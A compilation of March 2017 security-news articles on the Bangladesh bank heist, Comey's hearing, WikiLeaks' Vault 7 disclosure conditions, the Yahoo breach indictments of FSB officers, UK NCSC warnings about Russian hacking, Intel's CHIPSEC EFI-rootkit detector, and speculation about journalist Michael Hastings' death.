
Citing unnamed sources, The Wall Street Journal said prosecutors were developing cases showing Chinese middlemen helped the North Korean government orchestrate the enormous theft from the Bangladesh central bank.

In February 2016, thieves transferred the funds from Bangladesh's account at the New York Fed to accounts in the Philippines using authenticated international bank access codes in the SWIFT system, not by hacking the bank.

North Korea

It was unclear when or if any charges would be filed but any case might implicate North Korea without charging North Korean officials.

The Justice Department and the New York Fed declined to comment on the report.

The New York Fed over the past year has issued several statements, including joint statements with the central bank of Bangladesh and SWIFT, pledging to recover the stolen funds and enhance security of the payments system.

One statement said officials "remain concerned about this event and recommitted to working together to recover the entire proceeds of the fraud as expeditiously as possible, bring the perpetrators to justice in cooperation with law enforcement from other jurisdictions, and lend support to multilateral international efforts to further protect the global financial system from these types of attacks in the future."

However, the New York Fed did not respond to a request from AFP for comment on the status of the investigation.

Researchers at the security firm Symantec previously had linked the theft to a series of cyber-attacks on the US financial system and the 2014 hacking of Sony Pictures.


FBI's Comey: From Clinton Bugbear to Thorn in Trump's Side?

21.3.2017 securityweek BigBrothers
Eight months ago, James Comey hampered Hillary Clinton's White House bid with a damning assessment of her email practices.

On Monday, the powerful FBI chief lobbed another bombshell into the world of US politics -- this time directed at the sitting president, Donald Trump.

In a high-stakes congressional hearing followed live by millions in America and around the world, Comey flatly rejected Trump's explosive claim that he was wiretapped by his predecessor Barack Obama.

Comey delivered his assessment without a blink, telling lawmakers neither the Federal Bureau of Investigation nor the Justice Department had evidence to support such allegations.

Intensely concentrated, with furrowed brow, the towering Comey -- he stands 6'8" (two meters) tall -- took the heat during a marathon first public hearing on the issue of Russian meddling in last year's election, and Trump's unsubstantiated allegations of wiretapping.

The 56-year-old projected the cool demeanor of a veteran public official throughout the marathon hearing, during which he confirmed for the first time that his agency is investigating Russia's alleged election interference and notably Moscow's possible collusion with Trump's campaign.

But the FBI chief, who has been in his post since September 2013, is also a highly-skilled political operator, who knows his words carry weight.

The Democrat Clinton learned that the hard way, when Comey called a surprise press conference last July to deliver a dressing-down over her use of a private email server that reverberated all the way to the November polls.

Comey angered Republicans by deciding not to press charges against the former secretary of state. But Clinton, to this day, believes that Comey's public berating of her, followed by a last-minute intervention resurrecting the controversy in October, cost her the election.

When Trump decided to keep the Obama appointee in his job, it raised eyebrows from critics who saw it as a tacit reward for the part he played in damaging Clinton's chances.

But the FBI chief increasingly looks to be a thorn in the president's side.

- Straight shooter -

Comey has now set his sights on the issue of Russian election meddling, which has stalked Trump's young presidency.

And if there is one character trait the FBI chief is known for, it is tenacity.

Comey locked horns relentlessly with Silicon Valley as he sought to convince Apple to unlock a smartphone used by the perpetrator of a terror attack in California. The FBI's own experts ended up breaking into the device.

Under Obama, Comey repeatedly stole the spotlight from his boss, former attorney general Loretta Lynch, who was reduced in the Clinton case to announcing she was following his advice not to press charges.

The burning-hot Clinton investigation -- which saw Comey assailed on all sides -- did much to cement his reputation as a straight shooter, as well as thrust him into the public eye.

But Comey has been circulating in political and legal circles at the highest level for three decades, giving him the confidence to challenge the country's justice department, and even the White House.

In the wake of the 2014 fatal police shooting of unarmed black teen Michael Brown in Ferguson, Missouri, Comey raised hackles by supporting cops who were wary of fulfilling their duties, for fear of their actions being caught on video.

- Independent -

Many top US government careers begin in New York, and Comey is no exception -- he hails from the Manhattan suburbs. He cut his teeth as a federal prosecutor in New York and the Washington area.

In 2003, the father-of-five became deputy attorney general.

The following year, he faced one of his toughest showdowns, confirming his reputation for being independent and unafraid.

Comey had become acting attorney general due to the illness of his boss John Ashcroft.

At Ashcroft's bedside, the presidential counsel to George W. Bush, Alberto Gonzales, was trying to persuade him to reauthorize a controversial warrantless eavesdropping program.

Comey -- who was against extending the program -- later revealed the incident to senators, unleashing a political firestorm.


WikiLeaks will disclose CIA exploits to tech companies under specific conditions
19.3.2017 securityaffairs BigBrothers

Assange sent an email to tech firms including “a series of conditions” that they need to fulfill before gaining access to details included in the Vault 7.
A couple of weeks ago Wikileaks published the Vault 7 archive, a huge trove of files detailing CIA hacking tools and capabilities.

The files allegedly originated from a high-security network of the U.S. Central Intelligence Agency (CIA). The Vault 7 data leak sheds light on the hacking capabilities of the US Intelligence Agency and provided details about its spying infrastructure used for the massive surveillance.

“The first full part of the series, “Year Zero”, comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA’s Center for Cyber Intelligence in Langley, Virginia,” reads the announcement issued by WikiLeaks by WikiLeaks.

“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, Trojans, weaponized “zero day” exploits, malware remote control systems and associated documentation.”

The Vault 7 dump includes confidential information, hacking tools, malicious codes and exploits developed to hack popular products from various IT companies, including Samsung, Apple, Google, and Microsoft.

Vault 7

The hacking tools in the arsenal of the CIA have been developed by the CCI’s Engineering Development Group (EDG). The developers at EDG are tasked of developing and testing any kind of malicious code, including implants, backdoors, exploits, Trojans and viruses.

WikiLeaks announced it was planning to share information on the hacking tools included in the Vault7 dump with the tech companies whose products are affected even if the White House has warned that there may be legal repercussions for the organization.

The organization wants to protect the customers of the major companies that use the products of several major companies that are impacted by the hacking tools in the data leak.

WikiLeaks clarified it would not release tools or exploits “until a consensus emerges on the technical and political nature of the CIA’s program and how such ‘weapons‘ should analyze, disarmed and published.”

During a WikiLeaks press conference on March 9, 2017, Julian Assange explained that the organization decided to share information with impacted companies.

“We have decided to work with them, to give them some exclusive access to some of the technical details we have, so that fixes can be pushed out,” WikiLeaks’ founder Julian Assange said during a Facebook Live press conference last week.

What has happened after a few days?

Assange contacted tech companies, included Apple, Microsoft, and Google in explain how Wikileaks intends to share the knowledge about the vulnerabilities the CIA was allegedly taking advantage.

It seems that Wikileaks requested the satisfaction of specific conditions to the tech companies.

According to Motherboard, Assange sent an email to Apple, Google, Microsoft and other companies this week including “a series of conditions” that the tech companies need to fulfill before gaining access to the actual technical details and code of the hacking tools included in the Vault 7 archive.

“WikiLeaks included a document in the email, requesting the companies to sign off on a series of conditions before being able to receive the actual technical details to deploy patches, according to sources.”reads the blog post published by Motherboard. “It’s unclear what the conditions are, but a source mentioned a 90-day disclosure deadline, which would compel companies to commit to issuing a patch within three months.”

Sources cited by Motherboard and informed on the matter mentioned a 90-day disclosure deadline, this means that Wikileaks is requesting tech companies to issue a patch for the vulnerabilities in just 3 months.


Follow
WikiLeaks ✔ @wikileaks
Update on CIA #Vault7 "zero day" software vulnerabilities

Ref: https://wikileaks.org/ciav7p1
3:45 AM - 18 Mar 2017
3,475 3,475 Retweets 4,233 4,233 likes
This implies an additional effort to the tech firms that would also decide to do not comply with Wikileaks’ conditions.

Of course, the best option for tech firms is to accept the conditions and fix the issues as soon as possible. At the same time also the CIA can decide to pass the information on the flaws to the companies avoiding that hackers in the wild can take advantage of the bugs. We cannot exclude that also a foreign government is already exploiting the flaws in targeted attacks.

“WikiLeaks and the government hold all the cards here, there’s not much the tech companies can do on their own besides rabidly looking through their code to look for any issues that might be related,” one of the anonymous sources said.

The CIA declined to comment on whether it plans to alert the tech companies. According to Motherboard, a spokesperson sent a statement saying that the agency has “no comment on the authenticity of purported intelligence documents released by Wikileaks or on the status of any investigation into the source of the documents.”

“As we’ve said previously, Julian Assange is not exactly a bastion of truth and integrity,” the spokesperson wrote. “The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize US personnel and operations, but also equip our adversaries with tools and information to do us harm.”


WikiLeaks Won't Disclose CIA Exploits To Companies Until Certain Demands Are Met
18.3.2017 thehackernews BigBrothers

It's been over a week since Wikileaks promised to hand over more information on hacking tools and tactics of the Central Intelligence Agency (CIA) to the affected tech companies, following a leak of a roughly 8,761 documents that Wikileaks claimed belonged to CIA hacking units.
"We have decided to work with them, to give them some exclusive access to some of the technical details we have, so that fixes can be pushed out," WikiLeaks' founder Julian Assange said during a Facebook Live press conference last week.
However, it looks like the things aren't that easier for tech companies as they look.
After days of waiting, Assange made its first contact with Apple, Microsoft, and Google this week and finally made his intentions clear – no sharing of bugs and vulnerabilities the CIA is or was allegedly taking advantage of until certain demands are met.
Multiple anonymous sources familiar with the matter told Motherboard that Assange sent an email to Apple, Google, Microsoft and other companies mentioned in the Vault 7 Leak this week and instead of reporting the bugs and exploits found in the leaked CIA documents, he made some demands.
A document included in the email listed "a series of conditions" that the tech companies need to fulfill before gaining access to the actual technical details and code of the hacking tools the anti-secrecy organization has in its possession.
Although the exact conditions are still unclear, one of the sources mentioned a 90-day disclosure deadline, which would require tech companies to issue a patch for the vulnerabilities within a three-month timeframe.
It's also not clear if any of the affected tech companies plan to comply with Wikileaks' demands.
While major tech companies like Apple, Google and Microsoft said that their recent security updates had already fixed the bugs mentioned in Vault 7, they would probably need to check out what WikiLeaks has in its store to ensure proper deployment of patches.
What will happen next is entirely unclear, but since the CIA has had its hacking arsenal public, the best option for the agency is to personally disclose all those loopholes and exploits to the affected companies to keep itself and its citizens safe from hackers as well as foreign government.
"WikiLeaks and the government hold all the cards here, there's not much the tech companies can do on their own besides rabidly looking through their code to look for any issues that might be related," one of the anonymous sources said.
Vault 7 is just the beginning of WikiLeaks' Year Zero disclosure, as the group promised to release more from the government and intelligence agencies in coming weeks.


Who is spying on communications in the Washington area? A rogue state is suspected of mass surveillance
17.3.2017 securityaffairs BigBrothers

US authorities uncovered a surveillance activity allegedly powered by a rogue entity that is tracking phones of Government officials and foreign diplomats.
Something very strange has happened in the Washington, D.C., region, experts noticed an unusual amount of highly suspicious cellphone activity. The fear is that a rogue actor is attempting to spy on communications of numerous individuals, including US Government officials and foreign diplomats.

The news was reported by the Washington Free Beacon who viewed sensitive documents regarding the issue and interviewed security insiders. The level of sophistication of the attacks suggests the involvement of a foreign nation-state actor.

“The authorities observed a large spike in suspicious activity on a major U.S. cellular carrier has raised red flags in the Department of Homeland Security and prompted concerns that cellphones in the region are being tracked.” reads the article published by Free Beacon. “Such activity could allow pernicious actors to clone devices and other mobile equipment used by civilians and government insiders, according to information obtained by the Free Beacon.”

According to the Free Bacon, attackers siphoned a huge amount of location data from a U.S. cellular carrier allowing the control of several cell phone towers in the area.

surveillance

The activity was spotted by a program known as ESD Overwatch that monitors cell towers activities for anomalies, the software is supported by DHS and ESD America.

According to a report prepared by ESD Overwatch, a contractor working on behalf of DHS, the data gathered by the ESD Overwatch program shows the U.S. cell carrier has experienced “unlawful access to their network for the purpose of large scale subscriber tracking.”

“Cell phone information gathered by the program shows major anomalies in the D.C.-area indicating that a third-party is tracking en-masse a large number of cellphones. Such a tactic could be used to clone phones, introduce malware to facilitate spying, and track government phones being used by officials in the area.” continues the Free Bacon.

“The attack was first seen in D.C. but was later seen on other sensors across the USA,” according to one source familiar with the situation. “A sensor located close to the White House and another over near the Pentagon have been part of those that have seen this tracking.”

The threat actor is trying to identify and track cellphones when they connect cellphone towers. The DHS’s Office of Public Affairs confirmed that the ESD Overwatch program was used in a 90-day pilot program that began Jan. 18.

There is also another disconcerting aspect of the story, it this the first time a threat actor launched a similar surveillance campaign?

According to the Free Beacon, there is no reply to my answer, “before the [ESD Overwatch program] surveillance program was initiated the federal government did not have a method to detect intrusions of the nature seen over the past several months.”

An official with ESD Overwatch confirmed the existence of the DHS program.

The surveillance of US cellular communication has been a top concern in Congress, lawmakers petitioned DHS on Wednesday to have information on the countermeasures in place to prevent foreign threat actors from spying on communications.


Two Russian former FSB agents and two hackers indicted for 2014 Yahoo data breach
16.3.2017 securityaffairs BigBrothers

The US authorities charged two former Russian FSB agents and two hackers for 2014 Yahoo data breach that caused the exposure of 500 Million Yahoo Accounts.
Last year it was disclosed the news of the 2014 Yahoo data breach that compromised over 500 million Yahoo user accounts.

At the time of the public disclosure made by Yahoo, the representatives of the company added that security experts suspect the involvement of nation-state actors.

“We have confirmed that a copy of certain user account information was stolen from the company’s network in late 2014 by what it believes is a state-sponsored actor. The account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (the vast majority with bcrypt) and, in some cases, encrypted or unencrypted security questions and answers.” reads the security notice issued by Yahoo.

“The ongoing investigation suggests that stolen information did not include unprotected passwords, payment card data, or bank account information; payment card data and bank account information are not stored in the system that the investigation has found to be affected. Based on the ongoing investigation, Yahoo believes that information associated with at least 500 million user accounts was stolen and the investigation has found no evidence that the state-sponsored actor is currently in Yahoo’s network. Yahoo is working closely with law enforcement on this matter.”

The US authorities have charged two Russian intelligence officers and two criminal hackers of have taken part in 2014 Yahoo hack.

The four defendants are:

Dmitry Aleksandrovich Dokuchaev, 33 — an officer in the FSB Center for Information Security at the time of the hack, and now Russian national and resident.
Igor Anatolyevich Sushchin, 43 — an FSB officer, a superior to Dokuchaev within the FSB, and Russian national and resident.
Alexsey Alexseyevich Belan, aka “Magg,” 29 — a Russian national and resident, who has been on the FBI’s Most Wanted Hackers list.
Karim Baratov, aka “Kay,” “Karim Taloverov” and “Karim Akehmet Tokbergenov,” 22 — a Canadian and Kazakh national and a resident of Canada.
The members of the group are charged of:

Conspiring to commit computer fraud and abuse
Conspiring to engage in and the theft of trade secrets
Conspiring to engage in and committing economic espionage
Conspiring to commit wire fraud
Counterfeit access device fraud
Counterfeit access device making equipment
Aggravated identity theft
Transmitting code with the intent to cause damage to computers
Unauthorized access to a computer for obtaining information for commercial advantage and private financial gain
“A grand jury in the Northern District of California has indicted four defendants, including two officers of the Russian Federal Security Service (FSB), for computer hacking, economic espionage and other criminal offenses in connection with a conspiracy, beginning in January 2014, to access Yahoo’s network and the contents of webmail accounts.” the Department of Justice announced yesterday.

According to the prosecutors, the hackers accessed at least 30 million accounts as part of a spam campaign aimed to steal the email contents of thousands of people.

2014 Yahoo data breach

According to the indictment, Belan downloaded the Yahoo database, an archive containing usernames, recovery e-mail accounts, phone numbers as well as “certain information required to manually create, or “mint,” account authentication web browser “cookies” for more than 500 million Yahoo accounts.”
Once obtained the information, the hackers used it to gain unauthorized access to the contents of accounts at other webmail providers, including Google. Russian and American officials, Russian journalists, employees of financial services and other businesses were privileged targets of the gang.

The United States authorities have requested extradition for all the suspects arrested in Russia, but it’s difficult due to the absence of extradition treaty with Russia.Let’s close with a note on the hackers, according to the Assistant Attorney General Mary McCord they were not involved in the DNC hack.


U.S. Government Indicts Two Russian FSB Officers Over Yahoo Hack

15.3.2017 securityweek BigBrothers
U.S. Government Indicts Four Over 2014 Yahoo Hack, Including Two Russian FSB Officers

The US government today announced the indictment of four individuals charged with computer hacking, economic espionage and other offenses in connection with the 2014 breach of Yahoo that involved the theft of information on at least 500 million user accounts. Three of the accused are Russian nationals currently living in Russia. The fourth, Karim Baratov, is a Canadian and Kazakh national who was arrested in Canada on Tuesday.

Two of the Russian nationals, Dmitry Aleksandrovich Dokuchaev and Igor Anatolyevich Sushchin are serving officers of the Russian Federal Security Service (FSB). In announcing the indictments, Acting Assistant Attorney General Mary McCord of the National Security Division made it clear that the US believes they were acting in their capacity as FSB officers.

The third Russian national is Alexsey Alexseyevich Belan. This is not the first time he has been indicted by the US. He was indicted on different charges in 2012 and 2013, and is on the FBI's 'Cyber Most Wanted' List. He is currently the subject of an Interpol Red Notice. He was arrested in a European country in June 2013, but managed to escape to Russia before he could be extradited to the US.

The belief is that the FSB officers employed cyber criminals (Belan and Baratov) to do the hacking. It suspects that the FSB's primary objective was espionage. Targets included the private accounts of Russian journalists; Russian and U.S. government officials; and employees of a prominent Russian cybersecurity company. The two non-FSB cyber criminals then used the stolen data for more traditional criminal activities.

"We've known for some time that spies have targeted email accounts as a primary vector to collect information," comments Eric O'Neill, a former FBI counter-terrorism operative who helped capture Russian spy Robert Hanssen -- and now national security strategist with Carbon Black. "Global communications, both personal and business, often rely on email as the first method of communication. This creates a detailed record that can be used for a variety of purposes. Infiltration into email accounts allows spies to collect credentials that provide access to targeted systems. Monitoring government agency systems informs policy decisions, collects information on defense and attack capability, and can provide an economic boost to foreign nations."

Belan also obtained access to Yahoo's Account Management Tool. Used in conjunction with the stolen account database, he and the FSB officers were able to locate Yahoo email accounts of interest and manually create cookies to allow unauthorized access to at least 6,500 accounts.

In a separate statement today, Yahoo commented, "the U.S. Department of Justice announced the indictment of four defendants, two Russian intelligence officers and two state-sponsored hackers, for the theft of Yahoo user data in late 2014, as well as cookie forging to obtain access to user accounts on our network in 2015 and 2016." Yahoo has always maintained its original position that the hack had been state-sponsored, and it is now vindicated.

"We appreciate the FBI's diligent investigative work and the DOJ’s decisive action to bring to justice those responsible for the crimes against Yahoo and its users." For its part, the government acknowledged the help of both Yahoo and Google in its investigations, and also acknowledged help from the Canadian authorities and the UK's MI5.

The US hopes, and (officially) expects the three Russians be turned over to the US for trial. "We would hope they would respect our criminal justice system, and respect these charges, and what they need to do," said McCord.

The reality is there is no extradition treaty with Russia, and this is unlikely to happen. Russia has already ignored two requests on Belan, and a third is expected to be issued tomorrow.

"Instead of detaining him [Belan, under the Red Notice] the FSB officers used him to break into Yahoo's networks. Meanwhile, Belan used his relationship with the two FSB officers and his access to Yahoo to commit additional crimes to line his pockets with money," said McCord.

Belan used his access to steal financial information such as gift card and credit card numbers from webmail accounts; to gain access to more than 30 million accounts whose contacts were then stolen to facilitate a spam campaign; and to earn commissions from fraudulently redirecting a subset of Yahoo’s search engine traffic.

The indictment of two Russian security officers will undoubtedly put further pressure on already strained US/Russian relations.

Asked if it would be possible to maintain a good working relationship with the FSB following these indictments, McCord replied, "I think that is a challenge. It is something we will continue to look at. I think this case is going to be a great test of that."

"Any indictment of Russia by the US DOJ will likely be met with recrimination and denial," adds O'Neill. "Russia will likely use the same playbook that China used when we charged five Chinese military spies for cyber espionage against U.S. corporations and a labor organization in 2014... China vehemently denounced the indictment and stated that the US used 'fabricated facts' and that it 'grossly violates the basic norms governing international relations and jeopardizes China-U.S. cooperation'."

“These accounts contain a tremendous amount of personal information, including personally identifiable information, financial account passwords, workplace account passwords, information about investments and financial issues, or details around the workplace projects and business plans of CEOs, attorneys, and high net worth investors, as well as politicians, military officers, or other government officials,” Steve Grobman, Intel Security’s CTO, told SecurityWeek.

“The public disclosure of such material could be sensitive enough to destroy careers, enable blackmail, endanger a mission, or influence high-level negotiations and decisions. The weaponization of such information in the realm of economic espionage presents unlimited opportunities for monetization," Grobman added.


US Charges Two Russian Spies & Two Hackers For Hacking 500 Million Yahoo Accounts
15.3.2017 thehackernews BigBrothers

The 2014 Yahoo hack disclosed late last year that compromised over 500 million Yahoo user accounts was believed to be carried out by a state-sponsored hacking group.
Now, two Russian intelligence officers and two criminal hackers have been charged by the US government in connection with the 2014 Yahoo hack that compromised about 500 million Yahoo user accounts, the Department of Justice announced Wednesday.
According to the prosecutors, at least 30 million accounts were accessed as part of a spam campaign to access the email contents of thousands of people, including journalists, government officials, and technology company employees.
The four defendants — Two officers from the Russian Federal Security Service (FSB) and two other hackers — are identified as:
Dmitry Aleksandrovich Dokuchaev, 33 — an officer in the FSB Center for Information Security at the time of the hack, and now Russian national and resident.
Igor Anatolyevich Sushchin, 43 — an FSB officer, a superior to Dokuchaev within the FSB, and Russian national and resident.
Alexsey Alexseyevich Belan, aka "Magg," 29 — a Russian national and resident, who has been on the FBI’s Most Wanted Hackers list and indicted twice in 2012 and 2013 by U.S. Federal grand juries for hacking and fraud charges.
Karim Baratov, aka "Kay," "Karim Taloverov" and "Karim Akehmet Tokbergenov," 22 — a Canadian and Kazakh national and a resident of Canada.
In a 38-page indictment [PDF] unsealed Wednesday, the prosecutors said the two Russian spies worked with two other hackers to break into and gained initial access to Yahoo in early 2014.
Belan, who is on the FBI's most-wanted cybercriminals list, used the file transfer protocol (FTP) to download the Yahoo database, containing usernames, recovery e-mail accounts, phone numbers as well as "certain information required to manually create, or "mint," account authentication web browser “cookies” for more than 500 million Yahoo accounts."
The spies then used the stolen information to obtain unauthorized access to the contents of accounts at Yahoo, Google and other webmail providers, including those of Russian and American officials, Russian journalists, employees of financial services and other businesses.
The range of charges are officially listed as:
Conspiring to commit computer fraud and abuse
Conspiring to engage in and the theft of trade secrets
Conspiring to engage in and committing economic espionage
Conspiring to commit wire fraud
Counterfeit access device fraud
Counterfeit access device making equipment
Aggravated identity theft
Transmitting code with the intent to cause damage to computers
Unauthorized access to a computer for obtaining information for commercial advantage and private financial gain
Baratov was arrested on Tuesday by the Toronto Police Department, while Belan and the two FSB officers are in Russia. The United States has requested all the three to be handed over to face charges, but the US has no extradition treaty with Russia.
Meanwhile, Assistant Attorney General Mary McCord said that there was no connection between the Wednesday indictment and the investigation into the hacking of the Democratic National Committee (DNC) last year.
The news of the arrest came few weeks after Yahoo and Verizon Communications Inc. agreed to reduce the price of the upcoming acquisition deal by $350 Million in the wake of the two data breaches.
The deal, which was previously finalized at $4.8 Billion, now valued at about $4.48 Billion in cash and is expected to close in the second quarter.


UK NCSC warns of cyber attacks powered by Russia against the political system
14.3.2017 securityaffairs BigBrothers

The UK National Cyber Security Center (NCSC) is warning of Russian political hacking capabilities, the risk of cyber attacks against the political system is high.
The alert was raised by the UK National Cyber Security Center (NCSC) that is informing political parties in the UK to warn about “the potential for hostile action against the UK political system.”

The warning doesn’t confirm that Russia is the most dangerous state for political hacking but the intelligence community has no doubts about cyber capabilities of Russians state-sponsored hackers.

In a separate context, the British Foreign Secretary Boris Johnson explained that there is no evidence of cyber attacks powered by Russian entities against the Brutish politicians and parties.

“We have no evidence the Russians are actually involved in trying to undermine our democratic processes at the moment. We don’t actually have that evidence. But what we do have is plenty of evidence that the Russians are capable of doing that.” Johnson declared on national television Sunday. Ha also referred the cyber attacks against the French TV TV4Monde and the diversionary strategy adopted by Russian hackers.

“There is no doubt that they have been up to all sorts of dirty tricks – bringing down French TV stations; you have seen what happened in the United States where there is no question at all they were involved in the hacking of the Democratic National Convention.”

Last year, the US government accused Russia of cyberattacks against American political organizations, the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) published a Joint Analysis Report(JAR) that includes information about the tools, infrastructure and TTPs used by the Russian civilian and military intelligence Services (RIS) against United States election.

U.S. Government linked the cyber activity to a Russian threat actor designated as GRIZZLY STEPPE. It was the first time that the JAR attributes a malicious cyber activity to specific countries or threat actors.

The fear of possible attacks powered by Russian hackers is shared among multiple European Governments.

In January, French Defense Minister Le Drian expressed concerns about cyber attacks against defense systems and warns of hacking campaigns on the upcoming elections.

The Minister warned of possible cyber attacks like the ones that targeted the 2016 US Presidential Election.

In France, the conservative candidate Francois Fillon has been praised by Russian president Vladimir Putin due to its intention to intensify the relationship with the Kremlin. On the other side, the candidate Marine Le Pen is in total opposition to Russia, for this reason, the experts believe that hackers could target him and his party.

Relations between Russia and France are not good due to the position of President Hollande on the dispute between Russia and Ukraine in the 2014 Crimean Crysis.

President Hollande also blamed Russia for war crimes over its bombardment of the Syrian city of Aleppo.

The Minister is overseeing an overhaul of the cyber-security operations conducted by his Government.

In November 2016, the Gorman government expressed concerns about possible interference of Russian nation-state hackers with the 2017 German election.

NCSC GCHQ

The German politicians fear the Kremlin’s cyber capabilities. The alleged Russian interference in the US Presidential election is unleashing a domino effect and insinuating the fear in governments.

“I don’t have any concrete information about the origin of the attacks on the Telekom network,” Chancellor Angela Merkel said on Tuesday in Berlin. “Let me just say that such cyberattacks, or ‘hybrid attacks’ as they’re known in Russian doctrine, are part of everyday life today, and we need to learn to deal with them.”

The Germany’s Interior Minister Thomas de Mazière expressed a great concern for explicitly blaming Moscow.

“It’s possible that we can’t clearly distinguish between criminal activities launched from a certain country and state activities,” Maizière declared at a conference of federal state interior ministers in Saarbrücken, when asked if Moscow was responsible for the attacks against the German routers.

The new president of German intelligence service (BND), Bruno Kahl, confirmed that foreign hackers can try to launch cyber attacks in the attempt to “delegitimize the democratic process” in the country.

“In an interview with the Süddeutsche Zeitung newspaper, Bruno Kahl – the new president of German intelligence service, the BND – complained about hackers trying to “delegitimize the democratic process as such” and said he had “indications” that the hacks “came from certain quarters,” namely Russia. And the Telekom hack is by no means the only attack of its kind in Germany.” reported DW.com.

Back to the warning issued by the GCHQ, in a letter sent to the British political parties, the NCSC chief executive Ciaran Martin invited to stay sharp on cyber attacks against their infrastructure in the attempt to subvert democratic processes in the country.

“You will be aware of the coverage of events in the United States, Germany and elsewhere reminding us of the potential for hostile action against the UK political system. This is not just about the network security of political parties’ own systems. Attacks against our democratic processes go beyond this and can include attacks on parliament, constituency offices, thinktanks and pressure groups and individuals’ email accounts.” Martin wrote in the letter.

“Protecting the UK’s political system from hostile cyber-activity is one of our operational priorities, so we have signposted parties to existing guidance and will deliver tailored seminars on cyber-security measures. The seminars will build on our existing advice and will provide an overview of threats, case studies on recent cyber-incidents, practical steps to reduce the risk and advice on incident management.”


UK Intelligence Agency Warns of Russian Political Hacking Capabilities

13.3.2017 securityweek BigBrothers

The UK's National Cyber Security Center (NCSC, part of GCHQ) has written to the British political parties to warn about "the potential for hostile action against the UK political system." Without confirming that the main threat is from Russia, the letter makes it clear that the primary threat is considered to be that country.

In a similar vein, the British Foreign Secretary Boris Johnson said on national television Sunday, "We have no evidence the Russians are actually involved in trying to undermine our democratic processes at the moment. We don’t actually have that evidence. But what we do have is plenty of evidence that the Russians are capable of doing that."

He added, "There is no doubt that they have been up to all sorts of dirty tricks – bringing down French TV stations; you have seen what happened in the United States where there is no question at all they were involved in the hacking of the Democratic National Convention."

In October 2016, the US government accused Russia of being behind cyberattacks against American political organizations. In December 2016, Germany accused Russia of waging hybrid political warfare. "Such cyber-attacks, or hybrid conflicts as they are known in Russian doctrine, are now part of daily life and we must learn to cope with them," said Chancellor Angela Merkel. Earlier this month the French government abandoned plans for expatriate electronic voting in the April/May presidential election after the National Cybersecurity Agency warned of an "extremely high risk" of cyberattacks.

In his letter to the British political parties, NCSC chief executive Ciaran Martin wrote, "You will be aware of the coverage of events in the United States, Germany and elsewhere reminding us of the potential for hostile action against the UK political system. This is not just about the network security of political parties' own systems. Attacks against our democratic processes go beyond this and can include attacks on parliament, constituency offices, thinktanks and pressure groups and individuals' email accounts."

In a separate statement, he explained, "Protecting the UK’s political system from hostile cyber-activity is one of our operational priorities, so we have signposted parties to existing guidance and will deliver tailored seminars on cyber-security measures. The seminars will build on our existing advice and will provide an overview of threats, case studies on recent cyber-incidents, practical steps to reduce the risk and advice on incident management."


CHIPSEC, Intel Security releases detection tool also for CIA EFI rootkits
13.3.2017 securityaffairs BigBrothers

After CIA leak, Intel Security releases CHIPSEC, a detection tool for EFI rootkits that detect rogue binaries inside the computer firmware.
A few days ago, WikiLeaks announced it is working with software makers to fix the zero-day flaws in Vault7 dump that impacted their products and services. The organization is sharing information on the hacking tools included in the Vault7 dump with them and IT vendors are already working to solve the problems.
In response to the CIA data Leak, Intel Security has released a tool that allows users to check if the firmware of their computers has been modified and contains unauthorized code.

Digging the CIA archive the experts discovered that the hackers of the Agency have developed EFI (Extensible Firmware Interface) rootkits for Apple’s Macbooks.

Developers at the CIA Embedded Development Branch (EDB) group have designed an OS X “implant” called DerStarke that implements a kernel code injection mechanism in a module dubbed Bokor and uses an EFI persistence module called Dark Matter.

The UEFI (Unified EFI) replaces the BIOS in modern computers, it is the low-level firmware that runs just before the operating system during the bootstrap process to initialize the computer.

CHIPSEC

It is composed of a huge number “applications” that implements different features in modern computers.

A malware running in a stealth way in the EFI is able to bypass any security mechanism and inject malicious code into the OS kernel, it also alsogain persistence on the infected machine, allowing the rootkits to survive reboots, system updates and even re-installations of the OS.

Reading the documents it is possible to discover another project developed by the CIA EDB code-named QuarkMatter that is a “Mac OS X EFI implant, which uses an EFI driver stored on the EFI system partition to provide persistence to an arbitrary kernel implant.”

Now the Advanced Threat Research team at Intel Security has designed a new module for its existing CHIPSEC open-source framework that is able to detect malicious EFI binaries.“CHIPSEC is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low-level interfaces, and forensic capabilities.” reads the description of the framework.”It can be run on Windows, Linux, Mac OS X and UEFI shell. Instructions for installing and using CHIPSEC can be found in the manual (chipsec-manual.pdf).”CHIPSEC is a collection of command-line tools that use low-level interfaces to analyze a system’s hardware, firmware, and platform components.The new CHIPSEC module allows the user to take a clean EFI image from the manufacturer, extract its contents and build a whitelist of the files it contains.
The CHIPSEC allow users to compare the above list against the list of binaries that compose the system’s current EFI or against an EFI image previously extracted from a system.


Michael Hastings crash, incident or assassination? New doubts after Wikileaks Vault 7 leak
13.3.2017 securityaffairs BigBrothers

Was Michael Hastings a victim of the CIA hacking tools? Wikileaks Vault 7 data leak reveals the ability of the Agency of car hacking.
This is the story of the mysterious death of Michael Hastings, an American journalist, who rose to prominence with his coverage of the Iraq War for Newsweek in the 2000s.

But to better understand the figure, let’s remind that Hastings was one of the most critic people of the Obama administration and its interference on the US journalism. He was referring to the restrictions on the freedom of the press by the Obama administration as a “war” on journalism.

His last work, “Why Democrats Love to Spy On Americans“, was published by BuzzFeed on June 7. Hastings died in a fiery high-speed automobile crash on June 18, 2013, in Los Angeles, California.

Michael Hastings crash

When the popular hackers Charlie Miller and Chris Valasek demonstrated that is possible to hack a connected car remotely, many experts and journalist started speculating that Hastings incident was caused by the US intelligence that had used some special tool to remotely control a vehicle. Sci-fi? Yet another conspiracy theory?

Last week Wikileaks released the “Vault 7,” a huge trove of CIA files that provided detailed information on the hacking capabilities of the US Central Intelligence Agency, including the ability to remotely hijack vehicles in order to conduct “undetectable assassinations.”

Curiously, according to the San Diego 6 News. Hastings had been investigating CIA Director John Brennan prior to the incident he had also contacted WikiLeaks lawyer Jennifer Robinson just a few hours before he died, confirming that feds investigating his work.

Just coincidences, but some details on the incidents rose the suspicion among the journalists.

“Several details regarding the crash itself also suggested the possibility that Hastings’ death was the result of foul play, despite official statements to the contrary. For instance, the car caused no damage to the median curb dividing the four-lane road where the crash occurred, nor were there any skid marks present – despite the fact that the car made a sudden 60-degree turn into a palm tree.” reported Mintpressnews.com.

